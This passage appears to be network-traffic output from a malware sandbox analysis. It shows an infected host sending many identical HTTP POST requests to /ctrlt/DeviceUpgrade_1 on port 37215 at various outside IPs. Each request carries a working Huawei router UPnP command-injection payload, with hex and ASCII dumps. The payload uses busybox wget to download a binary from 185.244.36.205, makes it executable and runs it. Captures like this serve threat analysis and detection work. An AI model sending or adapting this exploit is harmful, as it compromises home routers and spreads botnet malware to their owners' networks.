                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1710192.168.2.1538972111.57.221.3437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:21.945091009 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1711192.168.2.1559500186.166.27.5337215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:21.945116043 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1712192.168.2.1534766138.126.218.19737215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:21.945149899 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1713192.168.2.1538776197.140.132.13337215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:21.945173979 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1714192.168.2.1536352190.64.115.12037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:21.945197105 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1715192.168.2.153862645.224.106.10337215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:21.945219994 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1716192.168.2.1549942186.2.147.18137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:21.945231915 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1717192.168.2.1549574156.63.96.6937215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:21.945270061 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1718192.168.2.1553948222.126.101.5137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:21.945278883 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1719192.168.2.1558512102.211.49.21537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:21.945291042 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
